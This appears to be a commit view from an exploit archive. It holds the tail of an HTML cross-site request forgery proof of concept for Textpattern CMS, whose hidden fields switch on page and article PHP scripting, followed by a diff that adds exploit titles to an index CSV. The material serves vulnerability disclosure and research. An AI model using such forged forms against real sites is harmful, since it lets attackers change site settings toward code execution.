<input type="hidden" name="send&#95;lastmod" value="1" />
<input type="hidden" name="publish&#95;expired&#95;articles" value="0" />
<input type="hidden" name="use&#95;textile" value="1" />
<input type="hidden" name="enable&#95;short&#95;tags" value="1" />
<input type="hidden" name="use&#95;plugins" value="1" />
<input type="hidden" name="admin&#95;side&#95;plugins" value="1" />
<input type="hidden" name="allow&#95;page&#95;php&#95;scripting" value="1" />
<input type="hidden" name="allow&#95;article&#95;php&#95;scripting" value="1" />
<input type="hidden" name="max&#95;url&#95;len" value="1000" />
<input type="hidden" name="syndicate&#95;body&#95;or&#95;excerpt" value="1" />
<input type="hidden" name="rss&#95;how&#95;many" value="5" />
<input type="hidden" name="show&#95;comment&#95;count&#95;in&#95;feed" value="1" />
<input type="hidden" name="include&#95;email&#95;atom" value="0" />
<input type="hidden" name="use&#95;mail&#95;on&#95;feeds&#95;id" value="0" />
<input type="hidden" name="comments&#95;on&#95;default" value="0" />
<input type="hidden" name="comments&#95;default&#95;invite" value="Comment" />
<input type="hidden" name="comments&#95;moderate" value="1" />
<input type="hidden" name="comments&#95;disabled&#95;after" value="42" />
<input type="hidden" name="comments&#95;auto&#95;append" value="0" />
<input type="hidden" name="comments&#95;mode" value="0" />
<input type="hidden" name="comments&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" />
<input type="hidden" name="comments&#95;sendmail" value="0" />
<input type="hidden" name="comments&#95;are&#95;ol" value="1" />
<input type="hidden" name="comment&#95;means&#95;site&#95;updated" value="1" />
<input type="hidden" name="comments&#95;require&#95;name" value="1" />
<input type="hidden" name="comments&#95;require&#95;email" value="1" />
<input type="hidden" name="never&#95;display&#95;email" value="1" />
<input type="hidden" name="comment&#95;nofollow" value="1" />
<input type="hidden" name="comments&#95;disallow&#95;images" value="0" />
<input type="hidden" name="comments&#95;use&#95;fat&#95;textile" value="0" />
<input type="hidden" name="spam&#95;blacklists" value="" />
<input type="hidden" name="custom&#95;1&#95;set" value="custom1" />
<input type="hidden" name="custom&#95;2&#95;set" value="custom2" />
<input type="hidden" name="custom&#95;3&#95;set" value="" />
<input type="hidden" name="custom&#95;4&#95;set" value="" />
<input type="hidden" name="custom&#95;5&#95;set" value="" />
<input type="hidden" name="custom&#95;6&#95;set" value="" />
<input type="hidden" name="custom&#95;7&#95;set" value="" />
<input type="hidden" name="custom&#95;8&#95;set" value="" />
<input type="hidden" name="custom&#95;9&#95;set" value="" />
<input type="hidden" name="custom&#95;10&#95;set" value="" />
<input type="hidden" name="step" value="prefs&#95;save" />
<input type="hidden" name="event" value="prefs" />
<input type="hidden" name="&#95;txp&#95;token" value="0342db47efb6882b488f6d367067d720" />
<input type="submit" value="Do Action" />
</form>
</body>
</html>

16
files_exploits.csv
View file

@ -40710,6 +40710,22 @@ id,file,description,date,author,type,platform,port
48889,exploits/php/webapps/48889.txt,"Seat Reservation System 1.0 - Unauthenticated SQL Injection",2020-10-16,"Rahul Ramkumar",webapps,php,
48890,exploits/php/webapps/48890.txt,"CS-Cart 1.3.3 - 'classes_dir' LFI",2020-10-16,0xmmnbassel,webapps,php,
48891,exploits/php/webapps/48891.txt,"CS-Cart 1.3.3 - authenticated RCE",2020-10-16,0xmmnbassel,webapps,php,
48892,exploits/php/webapps/48892.txt,"Tourism Management System 1.0 - Arbitrary File Upload",2020-10-19,"Ankita Pal",webapps,php,
48893,exploits/php/webapps/48893.txt,"Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting",2020-10-19,"Matthew Aberegg",webapps,php,
48894,exploits/php/webapps/48894.txt,"Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php,
48895,exploits/php/webapps/48895.txt,"Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php,
48896,exploits/php/webapps/48896.txt,"Online Student's Management System 1.0 - Remote Code Execution (Authenticated)",2020-10-19,"Akıner Kısa",webapps,php,
48897,exploits/php/webapps/48897.txt,"Online Discussion Forum Site 1.0 - XSS in Messaging System",2020-10-19,j5oh,webapps,php,
48898,exploits/php/webapps/48898.txt,"Online Job Portal 1.0 - Cross Site Scripting (Stored)",2020-10-19,"Akıner Kısa",webapps,php,
48899,exploits/hardware/webapps/48899.sh,"HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal",2020-10-19,"Alexei Kojenov",webapps,hardware,
48900,exploits/hardware/webapps/48900.sh,"HiSilicon Video Encoders - RCE via unauthenticated command injection",2020-10-19,"Alexei Kojenov",webapps,hardware,
48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware,
48902,exploits/hardware/webapps/48902.sh,"HiSilicon Video Encoders - Full admin access via backdoor password",2020-10-19,"Alexei Kojenov",webapps,hardware,
48903,exploits/hardware/webapps/48903.sh,"HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)",2020-10-19,"Alexei Kojenov",webapps,hardware,
48904,exploits/java/webapps/48904.txt,"Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in",2020-10-19,"Daniel Morris",webapps,java,
48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php,
48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php,
48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.